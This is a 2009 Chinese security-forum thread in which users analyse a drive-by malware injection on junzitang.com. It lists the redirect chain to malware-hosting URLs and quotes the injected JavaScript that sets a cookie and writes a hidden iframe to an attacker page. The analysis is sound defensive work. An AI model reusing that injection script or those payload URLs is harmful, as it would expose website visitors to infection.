[这个网好像被挂马了]www.junzitang.com[挂马][已检测by aarwwefdds]

显示全部楼层 · 发表于 2009-1-30 14:41:21

确实挂了
http://www.ailyes.cn/b073399/14.htm
http://www.ailyes.cn/new.js
http://qq.18i16.net/exe1/b07.css

显示全部楼层 · 发表于 2009-1-30 14:42:53

关于:hxxp://www.junzitang.com/解密的日志(全体输出-  29):

Level 0>http://www.junzitang.com/
Level 1>http://www.junzitang.com/menu.js
Level 1>http://www.junzitang.com/scripts/common.js
Level 2>http://www.ailyes.cn/b073399/cqvip.htm
Level 3>http://www.ailyes.cn/b073399/new.html
Level 4>http://www.ailyes.cn/cx.htm
Level 5>http://www.ailyes.cn/cx.js
Level 6>http://121.12.173.218/exe1/cx.css  ●
Level 4>http://www.ailyes.cn/b073399/fx.htm
Level 5>http://www.ailyes.cn/b073399/xlink.html
Level 5>http://www.ailyes.cn/b073399/mlink.html
Level 4>http://www.ailyes.cn/new.js
Level 5>http://qq.18i16.net/baidu.cab  ●
Level 4>http://www.ailyes.cn/real11.htm
Level 5>http://www.ailyes.cn/realplay.js
Level 6>http://qq.18i16.net/exe1/real11.css  ●
Level 4>http://www.ailyes.cn/real10.htm
Level 5>http://qq.18i16.net/exe1/re.css  ●
Level 4>http://www.ailyes.cn/bfyy.htm
Level 5>http://www.ailyes.cn/bf.js
Level 6>http://qq.18i16.net/exe1/bf.css  ●
Level 4>http://www.ailyes.cn/lzz.htm
Level 5>http://www.ailyes.cn/lzz.js
Level 6>http://qq.18i16.net/exe1/lzz.css  ●
Level 4>http://www.ailyes.cn/b073399/14.htm
Level 5>http://qq.18i16.net/exe1/b07.css  ●
Level 4>http://www.ailyes.cn/as.htm
Level 1>http://www.junzitang.com/scripts/jquery.js
Level 1>http://js.tongji.yahoo.com.cn/0/47/463/ystat.js

Log by aarwwefdds

显示全部楼层 · 发表于 2009-1-30 14:43:50

原帖由 250662772 于 2009-1-30 14:41 发表
确实挂了
http://www.ailyes.cn/b073399/14.htm
http://www.ailyes.cn/new.js
http://qq.18i16.net/exe1/b07.css

真够省力的....
解密还是实在点好...

显示全部楼层 · 发表于 2009-1-30 14:46:56

是不是www.junzitang.com上没有挂马，而是弹出的网页上有毒？我后来又上了几次，红伞都没报

显示全部楼层 · 发表于 2009-1-30 14:54:09

原帖由 marsszp49 于 2009-1-30 14:46 发表
是不是www.junzitang.com上没有挂马，而是弹出的网页上有毒？我后来又上了几次，红伞都没报

不是，挂马的脚本有COOKIE检测，第二次上挂马的网页，脚本检测到有COOKIE，挂马的网页就不会起效..

显示全部楼层 · 发表于 2009-1-30 14:56:56

原帖由 aarwwefdds 于 2009-1-30 14:54 发表

不是，挂马的网页有COOKIE检测，第二次上挂马的网页检测到有COOKIE，挂马的网页就不会起效..

我早上发现的时候解到Http://www.ailyes.cn/b073399/cqvip.htm这就解不下去了

好背啊

显示全部楼层 · 发表于 2009-1-30 14:58:14

这段Script检测COOKIE：

function Get(){
var NaNGethBp1 = new window["Date"]()
NaNGethBp1["setTime"](NaNGethBp1["getTime"]() + 24*60*60*1000)
var AV2 = new window["String"](window["document"]["cookie"])
var RLmG3 = "Cookie1="
var RgmJDvsU4 = AV2["indexOf"](RLmG3)
if (RgmJDvsU4 != -1){
} else
{ window["document"]["cookie"] = "Cookie1=killav;expires="+ NaNGethBp1["toGMTString"]();
window["document"]["writeln"]("<iframe src=Http://www.ailyes.cn/b073399/cqvip.htm width=100 height=0></iframe> ");
}
}Get()

显示全部楼层 · 发表于 2009-1-30 15:00:57

原帖由 taoyuan237 于 2009-1-30 14:56 发表

我早上发现的时候解到Http://www.ailyes.cn/b073399/cqvip.htm这就解不下去了
452823好背啊

话说这个“H”大写就会提示DNS Failed
谁叫这个Freshow脑筋不会急转弯啊...[:27:]

显示全部楼层 · 发表于 2009-1-30 17:08:03

谢谢，各位

[已鉴定] [这个网好像被挂马了]www.junzitang.com[挂马][已检测by aarwwefdds]